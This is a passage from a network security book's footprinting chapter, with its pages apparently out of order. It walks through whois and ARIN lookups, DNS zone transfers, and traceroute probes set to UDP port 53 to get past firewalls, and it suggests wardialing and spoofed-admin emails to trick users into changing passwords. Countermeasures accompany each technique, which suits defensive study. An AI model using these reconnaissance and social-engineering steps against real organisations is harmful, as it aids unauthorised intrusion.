Boyd, Woody [Network Engineer] (WB9201) woody@ACME.NET
201-555-9011 (201)555-3338 (FAX) 201-555-1212
Record last updated on 13-Sep-95.
Record created on 30-May-95.
Database last updated on 14-Apr-99 13:20:47 EDT.
Domain servers in listed order:
DNS.ACME.NET 10.10.10.1
DNS2.ACME.NET 10.10.10.2
This type of query provides you with information related to the following:
t The registrant
n The domain name
n The administrative contact
n When the record was created and updated
s The primary and secondary DNS servers
At this point, you need to become a bit of a cybersleuth. Analyze the information for
clues that will provide you with more information. We commonly refer to excess information
or information leakage as “enticements.” That is, they may entice an attacker into
mounting a more focused attack. Let us review this information in detail.
By inspecting the registrant information, we can ascertain if this domain belongs to
the entity that we are trying to footprint. We know that Acme Networks is located in Arizona,
so it is safe to assume this information is relevant to our footprint analysis. Keep in
mind, the registrant’s locale doesn’t necessarily have to correlate to the physical locale of
the entity. Many entities have multiple geographic locations, each with its own Internet
connections; however, they may all be registered under one common entity. For your domain,
it would be necessary to review the location and determine if it was related to your
organization. The domain name is the same domain name that we used for our query, so
this is nothing new to us.
The administrative contact is an important piece of information because it may tell
you the name of the person responsible for the Internet connection or firewall. It also lists
voice and fax numbers. This information is an enormous help when you’re performing a
dial-in penetration review. Just fire up the wardialers in the noted range, and you’re off to
a good start in identifying potential modem numbers. In addition, an intruder will often
pose as the administrative contact, using social engineering on unsuspecting users in an
organization. An attacker will send spoofed email messages posing as the administrative
contact to a gullible user. It is amazing how many users will change their password to
whatever you like, as long as it looks like the request is being sent from a trusted technical
support person.
Chapter 1: Footprinting 15
16 Hacking Exposed: Network Security Secrets and Solutions
The record creation and modification dates indicate how accurate the information is.
If the record was created five years ago but hasn’t been updated since, it is a good bet
some of the information (for example, Administrative Contact) may be out of date.
The last piece of information provides you with the authoritative DNS servers. The
first one listed is the primary DNS server, and subsequent DNS servers will be secondary,
tertiary, and so on. We will need this information for our DNS interrogation discussed
later in this chapter. Additionally, we can try to use the network range listed as a starting
point for our network query of the ARIN database.
Using a server directive with the HST record gained from a whois query, you can discover the other
domains for which a given DNS server is authoritative. The following steps show you how.
1. Execute a domain query as detailed earlier.
2. Locate the first DNS server.
3. Execute a whois query on that DNS server:
whois "HOST 10.10.10.1"@whois.networksolutions.com
4. Locate the HST record for the DNS server.
5. Execute a whois query with the server directive using whois and
the respective HST record:
whois "SERVER NS9999-HST"@whois.networksolutions.com
Network Query
The American Registry for Internet Numbers (ARIN) is another database that we can use
to determine networks associated with our target domain. This database maintains specific
network blocks that an organization owns. It is particularly important to perform
this search to determine if a system is actually owned by the target organization or if it is
being co-located or hosted by another organization such as an ISP.
In our example, we can try to determine all the networks that “Acme Networks”
owns. Querying the ARIN database is a particularly handy query because it is not subject
to the 50-record limit implemented by Network Solutions. Note the use of the “.” wildcard.
[bash]$ whois "Acme Net."@whois.arin.net
[whois.arin.net]
Acme Networks (ASN-XXXX) XXXX 99999
Acme Networks (NETBLK) 10.10.10.0 – 10.20.129.255
Amore specific query can be submitted based upon a particular net block (10.10.10.0).
[bash]$ whois 10.10.10.0@whois.arin.net
[whois.arin.net]
Major ISP USA (NETBLK-MI-05BLK) MI-05BLK 10.10.0.0 - 10.30.255.255
ACME NETWORKS, INC. (NETBLK-MI-10-10-10) CW-10-10-10
10.10.10.0 - 10.20.129.255
ARIN provides a handy web-based query mechanism, as shown in Figure 1-4. By reviewing
the output, we can see that “Major ISP USA” is the main backbone provider and has
assigned a class A network (see TCP/IP Illustrated Volume 1 by Richard Stevens for a complete
discussion of TCP/IP) to Acme Networks. Thus, we can conclude that this is a valid
network owned by Acme Networks.
POC Query
Since the administrative contact may be the administrative contact for multiple organizations,
it is advantageous to perform a point of contact (POC) query to search by the user’s
Chapter 1: Footprinting 17
Figure 1-4. One of the easiest ways to search for ARIN information is from their web site.
database handle. The handle we are searching for is “WB9201,” derived from the preceding
domain query. You may uncover a domain that you were unaware of.
[bash]$ whois "HANDLE WB9201"@whois.networksolutions.com
Boyd, Woody [Network Engineer] (WB9201) woody@ACME.NET
BIG ENTERPRISES
11 TOWN CENTER AVE
EINSTEIN, AZ 20198
201-555-1212 (201)555-1212 (FAX) 201-555-1212
We could also search for @Acme.net to obtain a listing of all mail addresses for a given
domain. We have truncated the following results for brevity:
[bash]$ whois "@acme.net"@whois.networksolutions.net
Smith, Janet (JS9999) jsmith@ACME.NET (201)555-9211 (FAX) (201)555-3643
Benson, Bob (BB9999) bob@ACME.NET (201)555-0988
Manual, Eric(EM9999) ericm@ACME.NET (201)555-8484 (FAX) (201)555-8485
Bixon, Rob (RB9999) rbixon@ACME.NET (201)555-8072
U Countermeasure: Public Database Security
Much of the information contained in the various databases discussed thus far is geared
at public disclosure. Administrative contacts, registered net blocks, and authoritative
name server information is required when an organization registers a domain on the
Internet. However, security considerations should be employed to make the job of attackers
much more difficult.
Many times an administrative contact will leave an organization and still be able to
change the organization’s domain information. Thus, first ensure that the information listed
in the database is accurate. Update the administrative, technical, and billing contact information
as necessary. Furthermore, consider the phone numbers and addresses listed. These
can be used as a starting point for a dial-in attack or for social engineering purposes. Consider
using a toll-free number or a number that is not in your organization’s phone exchange.
In addition, we have seen several organizations list a fictitious administrative
contact, hoping to trip up a would-be social engineer. If any employee receives an email or
calls to or from the fictitious contact, it may tip off the information security department that
there is a potential problem.
Another hazard with domain registration arises from the way that some registrars allow
updates. For example, the current Network Solutions implementation allows automated
online changes to domain information. Network Solutions authenticates the domain registrant’s
identity through three different methods: the FROM field in an email, a password,
or via a Pretty Good Privacy (PGP) key. Shockingly, the default authentication method is
the FROM field via email. The security implications of this authentication mechanism are
prodigious. Essentially, anyone can trivially forge an email address and change the information
associated with your domain, better known as domain hijacking. This is exactly what
happened to AOL on October 16, 1998, as reported by the Washington Post. Someone impersonated
anAOLofficial and changed AOL’s domain information so that all traffic was
18 Hacking Exposed: Network Security Secrets and Solutions
Chapter 1: Footprinting 19
directed to autonete.net. AOL recovered quickly from this incident, but it underscores
the fragility of an organization’s presence on the Internet. It is important to choose a more
secure solution like password or PGP authentication to change domain information.
Moreover, the administrative or technical contact is required to establish the authentication
mechanism via Contact Form from Network Solutions.
Step 3. DNS Interrogation
After identifying all the associated domains, you can begin to query the DNS. DNS is a
distributed database used to map IP addresses to hostnames and vice versa. If DNS is
configured insecurely, it is possible to obtain revealing information about the organization.
MZone Transfers
Popularity: 9
Simplicity: 9
Impact: 3
Risk Rating: 7
One of the most serious misconfigurations a system administrator can make is allowing
untrusted Internet users to perform a DNS zone transfer.
A zone transfer allows a secondary master server to update its zone database from the
primary master. This provides for redundancy when running DNS, should the primary
name server become unavailable. Generally, a DNS zone transfer only needs to be performed
by secondary master DNS servers. Many DNS servers, however, are misconfigured
and provide a copy of the zone to anyone who asks. This isn’t necessarily bad if the only information
provided is related to systems that are connected to the Internet and have valid
hostnames, although it makes it that much easier for attackers to find potential targets. The
real problem occurs when an organization does not use a public/private DNS mechanism
to segregate their external DNS information (which is public) from its internal, private DNS
information. In this case, internal hostnames and IP addresses are disclosed to the attacker.
Providing internal IP address information to an untrusted user over the Internet is akin to
providing a complete blueprint, or roadmap, of an organization’s internal network.
Let’s take a look at several methods we can use to perform zone transfers and the
types of information that can be gleaned. While there are many different tools to perform
zone transfers, we are going to limit the discussion to several common types.
A simple way to perform a zone transfer is to use the nslookup client that is usually
provided with most UNIX and NT implementations. We can use nslookup in interactive
mode as follows:
[bash]$ nslookup
Default Server: dns2.acme.net
Address: 10.10.20.2
20 Hacking Exposed: Network Security Secrets and Solutions
>> server 10.10.10.2
Default Server: [10.10.10.2]
Address: 10.10.10.2
>> set type=any
>> ls -d Acme.net. >> /tmp/zone_out
We first run nslookup in interactive mode. Once started, it will tell you the default
name server that it is using, which is normally your organization’s DNS server or a DNS
server provided by your Internet service provider (ISP). However, our DNS server
(10.10.20.2) is not authoritative for our target domain, so it will not have all theDNSrecords
we are looking for. Thus, we need to manually tell nslookup which DNS server to
query. In our example, we want to use the primary DNS server for Acme Networks
(10.10.10.2). Recall that we found this information from our domain whois lookup performed
earlier.
Next we set the record type to any. This will allow you to pull any DNS records available
(man nslookup) for a complete list.
Finally, we use the ls option to list all the associated records for the domain. The –d
switch is used to list all records for the domain. We append a “.” to the end to signify the
fully qualified domain name—however, you can leave this off most times. In addition, we
redirect our output to the file /tmp/zone_out so thatwecan manipulate the output later.
After completing the zone transfer, we can view the file to see if there is any interesting
information that will allow us to target specific systems. Let’s review the output:
[bash]$ more zone_out
acct18 1D IN A 192.168.230.3
1D IN HINFO "Gateway2000" "WinWKGRPS"
1D IN MX 0 acmeadmin-smtp
1D IN RP bsmith.rci bsmith.who
1D IN TXT "Location:Telephone Room"
ce 1D IN CNAME aesop
au 1D IN A 192.168.230.4
1D IN HINFO "Aspect" "MS-DOS"
1D IN MX 0 andromeda
1D IN RP jcoy.erebus jcoy.who
1D IN TXT "Location: Library"
acct21 1D IN A 192.168.230.5
1D IN HINFO "Gateway2000" "WinWKGRPS"
1D IN MX 0 acmeadmin-smtp
1D IN RP bsmith.rci bsmith.who
1D IN TXT "Location:Accounting"
We won’t go through each record in detail, but we will point out several important
types. We see that for each entry we have an A record that denotes the IP address of the
system name located to the right. In addition, each host has an HINFO record that identifies
the platform or type of operating system running (see RFC 952). HINFO records are
Chapter 1: Footprinting 21
not needed, but provide a wealth of information to attackers. Since we saved the results of
the zone transfer to an output file, we can easily manipulate the results with UNIX programs
like grep, sed, awk, or perl.
Suppose we are experts in SunOS or Solaris. We could programmatically find out the
IP addresses that had an HINFO record associated with SPARC, Sun, or Solaris.
[bash]$ grep -i solaris zone_out |wc –l
388
Wecan see that we have 388 potential records that reference the word “Solaris.” Obviously,
we have plenty of targets.
Suppose we wanted to find test systems, which happen to be a favorite choice for attackers.
Why? Simple—they normally don’t have many security features enabled, often
have easily guessed passwords, and administrators tend not to notice or care who logs in
to them. They’re a perfect home for any interloper. Thus, we can search for test systems
as follows:
[bash]$ grep -i test /tmp/zone_out |wc –l
96
So we have approximately 96 entries in the zone file that contain the word “test.” This
should equate to a fair number of actual test systems. These are just a few simple examples.
Most intruders will slice and dice this data to zero-in on specific system types with
known vulnerabilities.
Keep a few points in mind. The aforementioned method only queries one nameserver at
a time. This means that you would have to perform the same tasks for all nameservers that
are authoritative for the target domain. In addition, we only queried the Acme.net domain.
If there were subdomains, we would have to perform the same type of query for each
subdomain (for example, greenhouse.Acme.net). Finally, you may receive a message stating
that you can’t list the domain or that the query was refused. This usually indicates that
the server has been configured to disallow zone transfers from unauthorized users. Thus,
you will not be able to perform a zone transfer from this server. However, if there are multiple
DNS servers, you may be able to find one that will allow zone transfers.
Now that we have shown you the manual method, there are plenty of tools that speed
the process, including, host, Sam Spade, axfr, and dig.
The host command comes with many flavors of UNIX. Some simple ways of using
host are as follows:
host -l Acme.net
or
host -l -v -t any Acme.net
If you need just the IP addresses to feed into a shell script, you can just cut out the IP
addresses from the host command:
host -l acme.net |cut
-f 4 -d" " >> /tmp/ip_out
Not all footprinting functions must be performed through UNIX commands. A number
of Windows products provide the same information, as shown in Figure 1-5.
Finally, you can use one of the best tools for performing zone transfers, axfr (http://
ftp.cdit.edu.cn/pub/linux/www.trinux.org/src/netmap/axfr-0.5.2.tar.gz) by Gaius. This
22 Hacking Exposed: Network Security Secrets and Solutions
Figure 1-5. If you’re Windows inclined, you could use the multifaceted Sam Spade to perform a
zone transfer as well as other footprinting tasks.
utility will recursively transfer zone information and create a compressed database of
zone and host files for each domain queried. In addition, you can even pass top-level domains
like com and edu to get all the domains associated with com and edu, respectively.
However, this is not recommended. To run axfr, you would type the following:
[bash]$ axfr Acme.net
axfr: Using default directory: /root/axfrdb
Found 2 name servers for domain 'Acme.net.':
Text deleted.
Received XXX answers (XXX records).
To query the axfr database for the information you just obtained, you would type
the following:
[bash]$ axfrcat Acme.net
Determine Mail Exchange (MX) Records
Determining where mail is handled is a great starting place to locate the target organization’s
firewall network. Often in a commercial environment, mail is handled on the same
system as the firewall, or at least on the same network. So we can use host to help harvest
even more information.
[bash]$ host Acme.net
Acme.net has address 10.10.10.1
Acme.net mail is handled (pri=20) by smtp-forward.Acme.net
Acme.net mail is handled (pri=10) by gate.Acme.net
If host is used without any parameters on just a domain name, it will try to resolve A
records first, then MX records. The preceding information appears to cross-reference
with the whois ARIN search we previously performed. Thus, we can feel comfortable
that this is a network we should be investigating.
U Countermeasure: DNS Security
DNS information provides a plethora of information to attackers, so it is important to reduce
the amount of information available to the Internet. From a host configuration perspective,
you should restrict zone transfers to only authorized servers. For modern versions of
BIND, the allow-transfer directive in the named.conf file can be used to enforce the restriction.
To restrict zone transfers in Microsoft’s DNS, you can use the Notify option. (See
http://support.microsoft.com/support/kb/articles/q193/8/37.asp for more information.)
For other nameservers, you should consult the documentation to determine what steps
are necessary to restrict or disable zone transfers.
On the network side, you could configure a firewall or packet-filtering router to deny
all unauthorized inbound connections to TCP port 53. Since name lookup requests are
UDP and zone transfer requests are TCP, this will effectively thwart a zone transfer attempt.
However, this countermeasure is a violation of the RFC, which states that DNS
Chapter 1: Footprinting 23
queries greater than 512 bytes will be sent via TCP. In most cases, DNS queries will easily
fit within 512 bytes. A better solution would be to implement cryptographic Transaction
Signatures (TSIGs) to allow only “trusted” hosts to transfer zone information. For a
step-by-step example of how to implement TSIG security, see http://romana.ucd.ie/
james/tsig.html.
Restricting zone transfers will increase the time necessary for attackers to probe for
IP addresses and hostnames. However, since name lookups are still allowed, attackers
could manually perform lookups against all IP addresses for a given net block. Therefore,
configure external name servers to provide information only about systems directly
connected to the Internet. External nameservers should never be configured to
divulge internal network information. This may seem like a trivial point, but we have
seen misconfigured nameservers that allowed us to pull back more than 16,000 internal IP
addresses and associated hostnames. Finally, we discourage the use of HINFO records.As
you will see in later chapters, you can identify the target system’s operating system with
fine precision. However, HINFO records make it that much easier to programmatically
cull potentially vulnerable systems.
Step 4. Network Reconnaissance
Now that we have identified potential networks, we can attempt to determine their network
topology as well as potential access paths into the network.
MTracerouting
Popularity: 9
Simplicity: 9
Impact: 2
Risk Rating: 7
To accomplish this task, we can use the traceroute (ftp://ftp.ee.lbl.gov/
traceroute.tar.gz) program that comes with most flavors of UNIX and is provided in Windows
NT. In Windows NT, it is spelled tracert due to the 8.3 legacy filename issues.
Traceroute is a diagnostic tool originally written by Van Jacobson that lets you
view the route that an IP packet follows from one host to the next. Traceroute uses the
time-to-live (TTL) option in the IP packet to elicit an ICMP TIME_EXCEEDED message
from each router. Each router that handles the packet is required to decrement the TTL
field. Thus, the TTL field effectively becomes a hop counter. We can use the functionality
of traceroute to determine the exact path that our packets are taking. As mentioned
previously, traceroute may allow you to discover the network topology employed by
the target network, in addition to identifying access control devices (application-based
firewall or packet-filtering routers) that may be filtering our traffic.
Let’s look at an example:
24 Hacking Exposed: Network Security Secrets and Solutions
Chapter 1: Footprinting 25
[bash]$ traceroute Acme.net
traceroute to Acme.net (10.10.10.1), 30 hops max, 40 byte packets
1 gate2 (192.168.10.1) 5.391 ms 5.107 ms 5.559 ms
2 rtr1.bigisp.net (10.10.12.13) 33.374 ms 33.443 ms 33.137 ms
3 rtr2.bigisp.net (10.10.12.14) 35.100 ms 34.427 ms 34.813 ms
4 hssitrt.bigisp.net (10.11.31.14) 43.030 ms 43.941 ms 43.244 ms
5 gate.Acme.net (10.10.10.1) 43.803 ms 44.041 ms 47.835 ms
We can see the path of the packets leaving the router (gate) and traveling three hops
(2–4) to the final destination. The packets go through the various hops without being
blocked. From our earlier work, we know that the MX record for Acme.net points to
gate.acme.net. Thus, we can assume this is a live host and that the hop before it (4) is the
border router for the organization. Hop 4 could be a dedicated application-based
firewall, or it could be a simple packet-filtering device—we are not sure yet. Generally,
once you hit a live system on a network, the system before it is a device performing routing
functions (for example, a router or a firewall).
This is a very simplistic example. But in a complex environment, there may be multiple
routing paths, that is, routing devices with multiple interfaces (for example, a Cisco 7500 series
router). Moreover, each interface may have different access control lists (ACLs) applied.
In many cases, some interfaces will pass your traceroute requests, while others will deny
it because of the ACL applied. Thus, it is important to map your entire network using
traceroute. After you traceroute to multiple systems on the network, you can begin to
create a network diagram that depicts the architecture of the Internet gateway and the location
of devices that are providing access control functionality. We refer to this as an access
path diagram.
It is important to note that most flavors of traceroute in UNIX default to sending
User Datagram Protocol (UDP) packets, with the option of using Internet Control
Messaging Protocol (ICMP) packets with the –I switch. In Windows NT, however, the
default behavior is to use ICMP echo request packets. Thus, your mileage may vary using
each tool if the site blocks UDP vs. ICMP and vice versa. Another interesting option of
traceroute includes the –g option that allows the user to specify loose source routing.
Thus, if you believe the target gateway will accept source-routed packets (which is a cardinal
sin), you might try to enable this option with the appropriate hop pointers (see man
traceroute in UNIX for more information).
There are several other switches that we need to discuss that may allow you to bypass
access control devices during our probe. The –p n option of traceroute allows you to
specify a starting UDP port number (n) that will be incremented by 1 when the probe is
launched. Thus, we will not be able to use a fixed port number without some modification to
traceroute. Luckily, Michael Schiffman has created a patch (http:// www.packetfactory
.net/Projects/firewalk/traceroute.diff) that adds the –S switch to stop port incrementation
for traceroute version 1.4a5 (ftp.cerias.purdue.edu/pub/tools/unix/netutils/traceroute/
old/). This allows you to force every packet we send to have a fixed port number, in the
hopes that the access control device will pass this traffic. A good starting port number
26 Hacking Exposed: Network Security Secrets and Solutions
would beUDPport 53 (DNS queries). Since many sites allow inboundDNS queries, there is
a high probability that the access control device will allow our probes through.
[bash]$ traceroute 10.10.10.2
traceroute to (10.10.10.2), 30 hops max, 40 byte packets
1 gate (192.168.10.1) 11.993 ms 10.217 ms 9.023 ms
2 rtr1.bigisp.net (10.10.12.13)37.442 ms 35.183 ms 38.202 ms
3 rtr2.bigisp.net (10.10.12.14) 73.945 ms 36.336 ms 40.146 ms
4 hssitrt.bigisp.net (10.11.31.14) 54.094 ms 66.162 ms 50.873 ms
5 * * *
6 * * *
We can see here that our traceroute probes, which by default send out UDP packets,
were blocked by the firewall.
Now let’s send a probe with a fixed port of UDP 53, DNS queries:
[bash]$ traceroute -S -p53 10.10.10.2
traceroute to (10.10.10.2), 30 hops max, 40 byte packets
1 gate (192.168.10.1) 10.029 ms 10.027 ms 8.494 ms
2 rtr1.bigisp.net (10.10.12.13) 36.673 ms 39.141 ms 37.872 ms
3 rtr2.bigisp.net (10.10.12.14) 36.739 ms 39.516 ms 37.226 ms
4 hssitrt.bigisp.net (10.11.31.14)47.352 ms 47.363 ms 45.914 ms
5 10.10.10.2 (10.10.10.2) 50.449 ms 56.213 ms 65.627 ms
Because our packets are now acceptable to the access control devices (hop 4), they are
happily passed. Thus, we can probe systems behind the access control device just by
sending out probes with a destination port of UDP 53. Additionally, if you send a probe
to a system that has UDP port 53 listening, you will not receive a normal ICMP unreachable
message back. Thus, you will not see a host displayed when the packet reaches its ultimate
destination.
Most of what we have done up to this point with traceroute has been command-
line oriented. For the graphically inclined, you can use VisualRoute (http://www
.visualroute.com) or NeoTrace (http://www.neotrace.com/) to perform your tracerouting.
VisualRoute provides a graphical depiction of each network hop and integrates this with
whois queries. VisualRoute, depicted in Figure 1-6, is appealing to the eye, but does not
scale well for large-scale network reconnaissance.
There are additional techniques that will allow you to determine specific ACLs that
are in place for a given access control device. Firewall protocol scanning is one such technique
and is covered in Chapter 11.
Chapter 1: Footprinting 27
U Countermeasure: Thwarting Network Reconnaissance
In this chapter, we only touched upon network reconnaissance techniques. We shall see
more intrusive techniques in the following chapters. There are, however, several countermeasures
that can be employed to thwart and identify the network reconnaissance probes
discussed thus far. Many of the commercial network intrusion detection systems (NIDSes)
will detect this type of network reconnaissance. In addition, one of the best free NIDS programs,
snort (http://www.snort.org/) by Marty Roesch, can detect this activity. If you are
interested in taking the offensive when someone traceroutes to you, Humble from Rhino9
developed a program called RotoRouter (http://packetstorm.securify.com/UNIX/loggers/
rr-1.0.tgz). This utility is used to log incoming traceroute requests and generate fake
Figure 1-6. VisualRoute, the Cadillac of traceroute tools, provides not just router hop information
but also geographic location, whois lookups, and web server banner information.
responses. Finally, depending on your site’s security paradigm, you may be able to configure
your border routers to limit ICMP and UDP traffic to specific systems, thus minimizing
your exposure.
SUMMARY
As you have seen, attackers can perform network reconnaissance or footprint your network
in many different ways. We have purposely limited our discussion to common
tools and techniques. Bear in mind, however, that new tools are released daily. Moreover,
we chose a simplistic example to illustrate the concepts of footprinting. Often you will be
faced with a daunting task of trying to identify and footprint tens or hundreds of domains.
Therefore, we prefer to automate as many tasks as possible via a combination of
shell and expect scripts or perl programs. In addition, there are many attackers well
schooled in performing network reconnaissance activities without ever being discovered,
and they are suitably equipped. Thus, it is important to remember to minimize the
amount and types of information leaked by your Internet presence and to implement vigilant
monitoring.
28 Hacking Exposed: Network Security Secrets and Solutions
Footprinting
3
Before the real fun for the hacker begins, three essential steps must be performed.
This chapter will discuss the first one—footprinting—the fine art of gathering target
information. For example, when thieves decide to rob a bank, they don’t just walk
in and start demanding money (not the smart ones, anyway). Instead, they take great
pains in gathering information about the bank—the armored car routes and delivery
times, the video cameras, and the number of tellers, escape exits, and anything else that
will help in a successful misadventure.
The same requirement applies to successful attackers. They must harvest a wealth of
information to execute a focused and surgical attack (one that won’t be readily caught).
As a result, attackers will gather as much information as possible about all aspects of an
organization’s security posture. Hackers end up with a unique footprint or profile of their
Internet, remote access, and intranet/extranet presence. By following a structured methodology,
attackers can systematically glean information from a multitude of sources to
compile this critical footprint on any organization.
WHAT IS FOOTPRINTING?
The systematic footprinting of an organization enables attackers to create a complete profile
of an organization’s security posture. By using a combination of tools and techniques,
attackers can take an unknown quantity (Widget Company’s Internet connection) and reduce
it to a specific range of domain names, network blocks, and individual IP addresses
of systems directly connected to the Internet. While there are many types of footprinting
techniques, they are primarily aimed at discovering information related to the following
environments: Internet, intranet, remote access, and extranet. Table 1-1 depicts these environments
and the critical information an attacker will try to identify.
Why Is Footprinting Necessary?
Footprinting is necessary to systematically and methodically ensure that all pieces of information
related to the aforementioned technologies are identified. Without a sound
methodology for performing this type of reconnaissance, you are likely to miss key pieces
of information related to a specific technology or organization. Footprinting is often the
most arduous task of trying to determine the security posture of an entity; however, it is
one of the most important. Footprinting must be performed accurately and in a controlled
fashion.
INTERNET FOOTPRINTING
While many footprinting techniques are similar across technologies (Internet and
intranet), this chapter will focus on footprinting an organization’s Internet connection(s).
Remote access will be covered in detail in Chapter 9.
4 Hacking Exposed: Network Security Secrets and Solutions
It is difficult to provide a step-by-step guide on footprinting because it is an activity
that may lead you down several paths. However, this chapter delineates basic steps that
should allow you to complete a thorough footprint analysis. Many of these techniques
can be applied to the other technologies mentioned earlier.
Chapter 1: Footprinting 5
Technology Identifies
Internet Domain name
Network blocks
Specific IP addresses of systems reachable via the Internet
TCP and UDP services running on each system identified
System architecture (for example, SPARC vs. X86)
Access control mechanisms and related access control lists (ACLs)
Intrusion detection systems (IDSes)
System enumeration (user and group names, system banners,
routing tables, SNMP information)
Intranet Networking protocols in use (for example, IP, IPX, DecNET,
and so on)
Internal domain names
Network blocks
Specific IP addresses of systems reachable via intranet
TCP and UDP services running on each system identified
System architecture (for example, SPARC vs. X86)
Access control mechanisms and related access control lists (ACLs)
Intrusion detection systems
System enumeration (user and group names, system banners,
routing tables, SNMP information)
Remote
access
Analog/digital telephone numbers
Remote system type
Authentication mechanisms
VPNs and related protocols (IPSEC, PPTP)
Extranet Connection origination and destination
Type of connection
Access control mechanism
Table 1-1. Environments and the Critical Information Attackers Can Identify
6 Hacking Exposed: Network Security Secrets and Solutions
Step 1. Determine the Scope of Your Activities
The first item to address is to determine the scope of your footprinting activities. Are you
going to footprint an entire organization, or are you going to limit your activities to certain
locations (for example, corporate vs. subsidiaries)? In some cases, it may be a daunting
task to determine all the entities associated with a target organization. Luckily, the
Internet provides a vast pool of resources you can use to help narrow the scope of activities
and also provides some insight as to the types and amount of information publicly
available about your organization and its employees.
MOpen Source Search
Popularity: 9
Simplicity: 9
Impact: 2
Risk Rating: 7
As a starting point, peruse the target organization’s web page if they have one. Many
times an organization’s web page provides a ridiculous amount of information that can
aid attackers. We have actually seen organizations list security configuration options for
their firewall system directly on their Internet web server. Other items of interest include
t Locations
n Related companies or entities
n Merger or acquisition news
n Phone numbers
n Contact names and email addresses
n Privacy or security policies indicating the types of
security mechanisms in place
s Links to other web servers related to the organization
In addition, try reviewing the HTML source code for comments. Many items not
listed for public consumption are buried in HTML comment tags such as “<,” “!,” and
“--.” Viewing the source code offline may be faster than viewing it online, so it is often
beneficial to mirror the entire site for offline viewing. Having a copy of the site locally may
allow you to programmatically search for comments or other items of interest, thusmaking
your footprinting activities more efficient. Wget (http://www.gnu.org/software/
Chapter 1: Footprinting 7
wget/wget.html) for UNIX and Teleport Pro (http://www.tenmax.com/teleport/home
.htm) for Windows are great utilities to mirror entire web sites.
After studying web pages, you can perform open source searches for information relating
to the target organization. News articles, press releases, and so on, may provide additional
clues about the state of the organization and their security posture. Web sites
such as finance.yahoo.com or http://www.companysleuth.com provide a plethora of information.
If you are profiling a company that is mostly Internet based, you may find by
searching for related news stories that they have had numerous security incidents. Using
your web search engine of choice will suffice for this activity. However, there are more
advanced searching tools and criteria you can use to uncover additional information.
The FerretPRO suite of search tools from FerretSoft (http://www.ferretsoft.com) is
one of our favorites. WebFerretPRO enables you to search many different search engines
simultaneously. In addition, other tools in the suite allow you to search IRC, USENET,
email, and file databases looking for clues. Also, if you’re looking for a free solution to
search multiple search engines, check out http://www.dogpile.com.
Searching USENET for postings related to @example.com often reveals useful information.
In one case, we saw a posting from a system administrator’s work account regarding
his new PBX system. He said this switch was new to him, and he didn’t know
how to turn off the default accounts and passwords. We’d hate to guess how many phone
phreaks were salivating over the prospect of making free calls at that organization. Needless
to say, you can gain additional insight into the organization and the technical prowess
of its staff just by reviewing their postings.
Lastly, you can use the advanced searching capabilities of some of the major search
engines like AltaVista or Hotbot. These search engines provide a handy facility that allows
you to search for all sites that have links back to the target organization’s domain. This
may not seem significant at first, but let’s explore the implications. Suppose someone in
an organization decides to put up a rogue web site at home or on the target network’s site.
This web server may not be secure or sanctioned by the organization. So we can begin to
look for potential rogue web sites just by determining which sites actually link to the target
organization’s web server, as shown in Figure 1-1.
You can see that the search returned all sites that link back to http://www.l0pht.com
and that contain the word “hacking.” So you could easily use this search facility to find
sites linked to your target domain.
The last example, depicted in Figure 1-2, allows you to limit your search to a particular
site. In our example, we searched http://www.l0pht.com for all occurrences of
“mudge.” This query could easily be modified to search for other items of interest.
Obviously, these examples don’t cover every conceivable item to search for during
your travels—be creative. Sometimes the most outlandish search yields the most productive
results.
EDGAR Search
For targets that are publicly traded companies, you can consult the Securities and Exchange
Commission (SEC) EDGAR database at http://www.sec.gov, as shown in Figure 1-3.
One of the biggest problems organizations have is managing their Internet connections,
especially when they are actively acquiring or merging with other entities. So it is
important to focus on newly acquired entities. Two of the best SEC publications to review
are the 10-Q and 10-K. The 10-Q is a quick snapshot of what the organization has done
over the last quarter. This update includes the purchase or disposition of other entities.
The 10-K is a yearly update of what the company has done and may not be as timely as the
10-Q. It is a good idea to peruse these documents by searching for “subsidiary” or “subsequent
events.” This may provide you with information on a newly acquired entity. Often
organizations will scramble to connect the acquired entities to their corporate network
with little regard for security. So it is likely that you may be able to find security weaknesses
8 Hacking Exposed: Network Security Secrets and Solutions
Figure 1-1. With the AltaVista search engine, use the link:www.example.com directive to
query all sites with links back to the target domain.
in the acquired entity that would allow you to leapfrog into the parent company. Attackers
are opportunistic and are likely to take advantage of the chaos that normally comes
with combining networks.
With an EDGAR search, keep in mind that you are looking for entity names that are
different from the parent company. This will become critical in subsequent steps when
you perform organizational queries from the various whois databases available (see
“Step 2. Network Enumeration”).
U Countermeasure: Public Database Security
Much of the information discussed earlier must be made publicly available; this is especially
true for publicly traded companies. However, it is important to evaluate and classify
the type of information that is publicly disseminated. The Site Security Handbook (RFC
2196) can be found at http://www.ietf.org/rfc/rfc2196.txt and is a wonderful resource
Chapter 1: Footprinting 9
Figure 1-2. With AltaVista, use the host:example.com directive to query the site for the
specified string (for example, “mudge”).
for many policy-related issues. Finally, remove any unnecessary information from your
web pages that may aid an attacker in gaining access to your network.
Step 2. Network Enumeration
Popularity: 9
Simplicity: 9
Impact: 5
Risk Rating: 8
The first step in the network enumeration process is to identify domain names and
associated networks related to a particular organization. Domain names represent the
10 Hacking Exposed: Network Security Secrets and Solutions
Figure 1-3. The EDGAR database allows you to query public documents, providing important
insight into the breadth of the organization by identifying its associated entities.
company’s presence on the Internet and are the Internet equivalent to your company’s
name, such as “AAAApainting.com” and “moetavern.com.”
To enumerate these domains and begin to discover the networks attached to them,
you must scour the Internet. There are multiple whois databases you can query that will
provide a wealth of information about each entity we are trying to footprint. Before the
end of 1999, Network Solutions had a monopoly as the main registrar for domain names
(com, net, edu, and org) and maintained this information on their whois servers. This
monopoly was dissolved and currently there is a multitude of accredited registrars
(http://www.internic.net/alpha.html). Having new registrars available adds steps in
finding our targets (see “Registrar Query” later in this step). We will need to query the
correct registrar for the information we are looking for.
There are many different mechanisms (see Table 1-2) to query the various whois databases.
Regardless of the mechanism, you should still receive the same information. Users
should consult Table 1-3 for other whois servers when looking for domains other than
com, net, edu, or org. Another valuable resource, especially for finding whois servers outside
of the United States, is http://www.allwhois.com. This is one of the most complete
whois resources on the Internet.
Chapter 1: Footprinting 11
Mechanism Resources Platform
Web interface http://www.networksolutions.com/
http://www.arin.net
Any platform with
a web client
Whois client Whois is supplied with most versions
of UNIX.
Fwhois was created by Chris
Cappuccio
UNIX
WS_Ping ProPack http://www.ipswitch.com/ Windows 95/NT/2000
Sam Spade http://www.samspade.org/ssw Windows 95/NT/2000
Sam Spade Web
Interface
http://www.samspade.org/ Any platform with a
web client
Netscan tools http://www.netscantools.com/
nstpromain.html
Windows 95/NT/2000
Xwhois http://c64.org/~nr/xwhois/ UNIX with X and
